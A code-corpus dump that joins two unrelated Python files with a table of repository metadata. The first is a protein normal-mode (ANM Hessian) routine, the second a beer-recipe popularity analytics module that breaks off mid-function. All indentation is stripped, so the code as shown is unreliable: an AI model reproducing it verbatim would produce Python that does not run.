contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcCustomH_A_NeighborsBoundGeneral(self, HR, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getMobile(), encounter.getBoundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(mobChain, boundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcOffDiagonalHessianBlockMatrixGeneral_IJ(self, encounter, workOnReceptor=True, selstr='calpha'):
""" Creates the off diagonal hessian block matrix and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
unboundCounterpart = encounter.getUnboundCounterpart()
unboundCounterpartCalphas = encounter.getUnboundCounterpart().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
mobileCalphas = encounter.getBoundCounterpart().select('calpha')
unboundCounterpart = encounter.getReference()
unboundCounterpartCalphas = encounter.getReference().select('calpha')
offDiagonalHessianMatrix = np.zeros(((referenceCalphas.numAtoms()*3), (unboundCounterpartCalphas.numAtoms()*3) ))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(mobChain, boundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the bound counterpart, the off diagonal part of the hessian needs an update in the 3*3 matrix of this atom and its neighbor
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# add the overall Term to the correct off diagonal super element in the hessian
counterPartCalphaPosition = encounter.accessANMs().getCalphaPosition(unboundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpart)
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, loopCounter*3, counterPartCalphaPosition*3)
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return offDiagonalHessianMatrix
# origs
def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
""" @V / @x_i@x_i (excluding gamma)"""
result = 1 + (r_ij_b * np.power(x_j - x_i, 2) ) / np.power(r_ij, 3) - r_ij_b/r_ij
return result
def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
""" @V / @x_i@y_j (excluding gamma) """
result = r_ij_b * (x_j - x_i) * ((y_j - y_i)/np.power(r_ij, 3))
return result
def secondDerivateTermOffDiagonalAtomsIJ(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
""" Equation 21 before reducing, Atilgan paper, @V / @x_i@y_j (excluding gamma) """
result = -1.0 * r_ij_b * (x_j - x_i) * ((y_j - y_i)/np.power(r_ij, 3))
return result
#
# using r_ij_b
# def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
# """ @V / @x_i@x_i (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = np.power(x_j - x_i, 2) / np.power(r_ij_b, 2)
# return result
#
# def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
# """ @V / @x_i@y_j (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = ((x_j - x_i)*(y_j - y_i))/ np.power(r_ij_b, 2)
# return result
# using r_ij
# def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
# """ @V / @x_i@x_i (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = np.power(x_j - x_i, 2) / np.power(r_ij, 2)
# return result
#
# def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
# """ @V / @x_i@y_j (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = ((x_j - x_i)*(y_j - y_i))/ np.power(r_ij, 2)
# return result
def make3By3HessianTerm(self, refChainCalpha, elementcontact, r_ij, r_ij_b):
""" Create a 3 by 3 matrix with the added terms for the hessian diagnonal (excluding multiplication with gamma)"""
x_i = refChainCalpha.getCoords()[0]
y_i = refChainCalpha.getCoords()[1]
z_i = refChainCalpha.getCoords()[2]
x_j = elementcontact.getCoords()[0]
y_j = elementcontact.getCoords()[1]
z_j = elementcontact.getCoords()[2]
deltaTerm = np.zeros((3,3))
deltaTerm[0][0] = self.secondDerivativeTermOnDiagonal(x_i, x_j, r_ij, r_ij_b)
deltaTerm[0][1] = self.secondDerivateTermOffDiagonal(x_i, x_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[0][2] = self.secondDerivateTermOffDiagonal(x_i, x_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[1][0] = deltaTerm[0][1]
deltaTerm[1][1] = self.secondDerivativeTermOnDiagonal(y_i, y_j, r_ij, r_ij_b)
deltaTerm[1][2] = self.secondDerivateTermOffDiagonal(y_i, y_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[2][0] = deltaTerm[0][2]
deltaTerm[2][1] = deltaTerm[1][2]
deltaTerm[2][2] = self.secondDerivativeTermOnDiagonal(z_i, z_j, r_ij, r_ij_b)
return deltaTerm
def add3By3MatrixtoHessian(self, delta3by3, HR, topleftIndex):
""" Add the delta3by3 matrix to its corresponding position of HR, located by
the topleftIndex. """
HR[topleftIndex][topleftIndex] += delta3by3[0][0]
HR[topleftIndex][topleftIndex+1] += delta3by3[0][1]
HR[topleftIndex][topleftIndex+2] += delta3by3[0][2]
HR[topleftIndex+1][topleftIndex] += delta3by3[1][0]
HR[topleftIndex+1][topleftIndex+1] += delta3by3[1][1]
HR[topleftIndex+1][topleftIndex+2] += delta3by3[1][2]
HR[topleftIndex+2][topleftIndex] += delta3by3[2][0]
HR[topleftIndex+2][topleftIndex+1] += delta3by3[2][1]
HR[topleftIndex+2][topleftIndex+2] += delta3by3[2][2]
return HR
def add3By3MatrixtoOffDiagonalHessianMatrixIJ(self, delta3by3, offDiagonalHessianMatrix, topleftIndex, counterpartTopleftIndex):
""" Add the delta3by3 matrix to its corresponding position of HR, located by
the topleftIndex. """
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex] += delta3by3[0][0]
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex+1] += delta3by3[0][1]
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex+2] += delta3by3[0][2]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex] += delta3by3[1][0]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex+1] += delta3by3[1][1]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex+2] += delta3by3[1][2]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex] += delta3by3[2][0]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex+1] += delta3by3[2][1]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex+2] += delta3by3[2][2]
return offDiagonalHessianMatrix
def make3By3OffDiagonalHessianTermIJ(self, refChainCalpha, elementcontact, r_ij, r_ij_b):
""" Create a 3 by 3 matrix with the added terms for the hessian super element off the diagnonal (excluding multiplication with gamma). """
x_i = refChainCalpha.getCoords()[0]
y_i = refChainCalpha.getCoords()[1]
z_i = refChainCalpha.getCoords()[2]
x_j = elementcontact.getCoords()[0]
y_j = elementcontact.getCoords()[1]
z_j = elementcontact.getCoords()[2]
deltaTerm = np.zeros((3,3))
deltaTerm[0][0] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, x_i, x_j, r_ij, r_ij_b)
deltaTerm[0][1] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[0][2] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[1][0] = deltaTerm[0][1]
deltaTerm[1][1] = self.secondDerivateTermOffDiagonalAtomsIJ(y_i, y_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[1][2] = self.secondDerivateTermOffDiagonalAtomsIJ(y_i, y_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[2][0] = deltaTerm[0][2]
deltaTerm[2][1] = deltaTerm[1][2]
deltaTerm[2][2] = self.secondDerivateTermOffDiagonalAtomsIJ(z_i, z_j, z_i, z_j, r_ij, r_ij_b)
return deltaTerm
def getCalphaPosition(self, atom1, reference):
""" Returns the position of atom1 among the calphas of reference. Useful if one
desires to know the index of an calpha atom in the ANM hessian made from reference calphas.
Args:
atom1: the calpha atom that the position is desired to know
reference: the reference structure where the calpha position is obtained from
Returns: Positive integer denoting the calpha position
"""
assert atom1.getName() == 'CA'
referenceCalphas = reference.select('calpha')
# try:
# idx = zip(referenceCalphas).index((atom1, ))
# return idx
# except ValueError:
# print "Exception in getCalphaPosition. This calpha cannot be located in the structure provided. "
for idx, referenceCalpha in enumerate(referenceCalphas):
if atom1 == referenceCalpha:
return idx
raise StopIteration("Exception in getCalphaPosition. This calpha cannot be located in the structure provided. ")
def normalizeM(self, M):
""" Normalize a set of modes, which are the columnvectors in M.
Args:
M: set of modes as columnvectors
Returns: normalized (magnitude of each mode is 1) set of modes as columnvectors in M
"""
Mnormed = None
if M.ndim == 1:
modeVector = Vector(M)
return modeVector.getNormed().getArray()
else:
for element in M.T:
modeVector = Vector(element)
modeNormalized = modeVector.getNormed()
if Mnormed is None:
Mnormed = modeNormalized.getArray()
else:
Mnormed = np.column_stack((Mnormed, modeNormalized.getArray()))
return Mnormed
def getNoOfZeroEigvals(self, anm):
""" Return the number of zero eigenvalues, the treshold is defined in the constant ZERO.
Args:
anm: the anm
Returns: number of zero eigenvalues
"""
ZERO = 1e-10
return sum(anm.getEigvals() < ZERO)
def removeInterAtoms(self, arr, interCalphaIndices):
""" Set x,y,z coordinations of atoms indicated by calphasInterIndices to 0,0,0 in arr.
Args:
arr: the array with x,y,z coordinates
interCalphaIndices: calphas with intermolecular contacts
Returns: arr with x,y,z positions of atoms from interCalphaIndices set to 0,0,0
"""
for calphaIndex in interCalphaIndices:
arr[(calphaIndex*3)] = 0.0
arr[(calphaIndex*3+1)] = 0.0
arr[(calphaIndex*3+2)] = 0.0
return arr
| 60.751498
| 470
| 0.738643
| 15,135
| 131,770
| 6.281533
| 0.056822
| 0.027169
| 0.026422
| 0.010992
| 0.826172
| 0.79773
| 0.771981
| 0.753763
| 0.73342
| 0.718968
| 0
| 0.010537
| 0.155142
| 131,770
| 2,169
| 471
| 60.751498
| 0.843443
| 0.225066
| 0
| 0.665665
| 0
| 0
| 0.06589
| 0.004404
| 0
| 0
| 0
| 0
| 0.077385
| 0
| null | null | 0.001503
| 0.009767
| null | null | 0.069872
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8f79c1c541ae6bfcae5f65ff145cc66e1b39827
| 24,229
|
py
|
Python
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 21
|
2020-09-08T07:05:37.000Z
|
2022-03-25T20:30:47.000Z
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 1
|
2022-02-02T02:03:26.000Z
|
2022-02-26T10:18:06.000Z
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 4
|
2020-10-10T10:48:07.000Z
|
2022-03-11T13:09:49.000Z
|
import math
from abc import ABC
from typing import Optional, Iterable
import pandas as pd
from django.db import connection
from pandas import DataFrame
from recipe_db.analytics import METRIC_PRECISION, POPULARITY_START_MONTH, POPULARITY_CUT_OFF_DATE
from recipe_db.analytics.scope import RecipeScope, StyleProjection, YeastProjection, HopProjection, \
FermentableProjection
from recipe_db.analytics.utils import remove_outliers, get_style_names_dict, get_hop_names_dict, get_yeast_names_dict, \
get_fermentable_names_dict, RollingAverage, Trending, months_ago
from recipe_db.models import Recipe
class RecipeLevelAnalysis(ABC):
def __init__(self, scope: RecipeScope) -> None:
self.scope = scope
class RecipesListAnalysis(RecipeLevelAnalysis):
def random(self, num_recipes: int) -> Iterable[Recipe]:
scope_filter = self.scope.get_filter()
query = '''
SELECT r.uid AS recipe_id
FROM recipe_db_recipe AS r
WHERE r.name IS NOT NULL {}
ORDER BY random()
LIMIT %s
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters + [num_recipes])
recipe_ids = df['recipe_id'].values.tolist()
if len(recipe_ids) == 0:
return []
return Recipe.objects.filter(uid__in=recipe_ids).order_by('name')
class RecipesCountAnalysis(RecipeLevelAnalysis):
def total(self) -> int:
scope_filter = self.scope.get_filter()
query = '''
SELECT
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
if len(df) == 0:
return 0
return df['total_recipes'].values.tolist()[0]
def per_day(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created) AS day,
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
GROUP BY date(r.created)
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('day')
return df
def per_month(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
GROUP BY date(r.created, 'start of month')
ORDER BY month ASC
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('month')
return df
def per_style(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
ras.style_id,
count(DISTINCT r.uid) AS total_recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles ras
ON r.uid = ras.recipe_id
WHERE
1 {}
GROUP BY ras.style_id
ORDER BY ras.style_id ASC
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('style_id')
return df
class RecipesPopularityAnalysis(RecipeLevelAnalysis):
def popularity_per_style(
self,
projection: Optional[StyleProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or StyleProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ras.style_id,
count(r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY month, ras.style_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('style_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['style_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'style_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top styles
if top_ids is not None:
smoothened['style_id'] = pd.Categorical(smoothened['style_id'], top_ids)
smoothened = smoothened.sort_values(['style_id', 'month'])
smoothened['beer_style'] = smoothened['style_id'].map(get_style_names_dict())
return smoothened
def popularity_per_hop(
self,
projection: Optional[HopProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or HopProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rh.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipehop AS rh
ON r.uid = rh.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), rh.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['hop'] = smoothened['kind_id'].map(get_hop_names_dict())
return smoothened
def popularity_per_fermentable(
self,
projection: Optional[FermentableProjection] = None,
num_top: Optional[int] = None,
) -> DataFrame:
projection = projection or FermentableProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rf.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipefermentable AS rf
ON r.uid = rf.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), rf.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['fermentable'] = smoothened['kind_id'].map(get_fermentable_names_dict())
return smoothened
def popularity_per_yeast(
self,
projection: Optional[YeastProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or YeastProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ry.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipeyeast AS ry
ON r.uid = ry.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), ry.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
